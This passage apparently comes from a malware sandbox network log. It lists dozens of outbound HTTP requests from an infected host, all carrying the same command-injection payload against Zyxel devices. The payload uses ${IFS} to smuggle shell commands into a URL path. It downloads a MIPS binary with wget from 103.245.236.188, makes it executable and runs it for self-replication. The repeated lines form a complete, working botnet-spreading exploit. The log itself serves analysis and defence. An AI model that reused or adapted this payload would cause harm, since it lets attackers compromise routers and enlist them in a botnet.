                                                Jan 12, 2024 18:24:20.468365908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                455192.168.2.13348982.34.215.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468386889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                456192.168.2.1356656133.166.167.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468441010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                457192.168.2.135495250.112.118.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468456030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                458192.168.2.1335270169.23.241.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468482971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                459192.168.2.135395878.173.112.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468523979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                460192.168.2.133745085.163.59.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468565941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                461192.168.2.1351168172.103.99.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468606949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                462192.168.2.135974444.111.7.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468636990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                463192.168.2.1354588208.246.126.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468658924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                464192.168.2.1338570136.83.112.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468693972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                465192.168.2.1350854118.160.22.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468734980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                466192.168.2.1335338139.154.131.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468755960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                467192.168.2.1355140145.229.176.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468818903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                468192.168.2.133561496.24.245.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468827009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                469192.168.2.1345940136.39.109.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468975067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                470192.168.2.1333988204.231.96.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469016075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                471192.168.2.1347312218.24.180.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469052076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                472192.168.2.1352646140.253.237.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469084978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                473192.168.2.1341842198.124.21.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469130039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                474192.168.2.133306212.87.29.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469163895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                475192.168.2.1360018110.33.130.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469204903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                476192.168.2.1350032178.142.84.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469207048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                477192.168.2.135344843.224.102.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469274044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                478192.168.2.133591276.215.172.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469311953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                479192.168.2.1358674137.150.32.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469331980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                480192.168.2.1357716159.19.134.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469367981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                481192.168.2.1348810115.100.11.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469420910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                482192.168.2.133897878.81.39.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469458103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                483192.168.2.135660493.134.116.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469489098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                484192.168.2.1355670126.125.25.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469523907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                485192.168.2.1353556103.209.251.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469580889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                486192.168.2.1337490180.209.29.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469623089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                487192.168.2.1346826148.200.155.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469651937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                488192.168.2.13571949.12.247.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469706059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                489192.168.2.133594441.182.5.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469744921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                490192.168.2.133406419.226.92.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469757080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                491192.168.2.1334624194.34.196.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469801903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                492192.168.2.1353780113.22.57.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469854116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                493192.168.2.1339014117.156.174.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469901085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                494192.168.2.135608480.18.143.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469944000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                495192.168.2.1344080114.75.242.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.469980955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                496192.168.2.133299273.181.249.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470037937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                497192.168.2.1336242172.213.168.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470066071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                498192.168.2.1349892117.221.49.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470114946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                499192.168.2.135208454.78.43.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470165014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                500192.168.2.135746873.166.250.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470192909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                501192.168.2.1347496159.201.45.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470221996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                502192.168.2.1347966148.17.85.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470252037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                503192.168.2.1358840172.103.49.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470330000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                504192.168.2.1351666146.6.158.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470345974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                505192.168.2.133688472.156.229.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470390081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                506192.168.2.133959467.17.164.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470448017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                507192.168.2.13537264.112.148.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470482111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                508192.168.2.1333538163.184.5.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470509052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                509192.168.2.133834267.97.163.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470570087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                510192.168.2.133895017.245.46.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470601082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                511192.168.2.135911275.230.213.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470626116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                512192.168.2.1338318197.14.57.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470701933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                513192.168.2.133613677.67.18.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470732927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                514192.168.2.1352286154.17.31.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470777035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                515192.168.2.135191617.249.201.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470808983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                516192.168.2.134011884.155.87.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470865965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                517192.168.2.1348364181.102.143.218443
                                                TimestampBytes transferredDirectionData
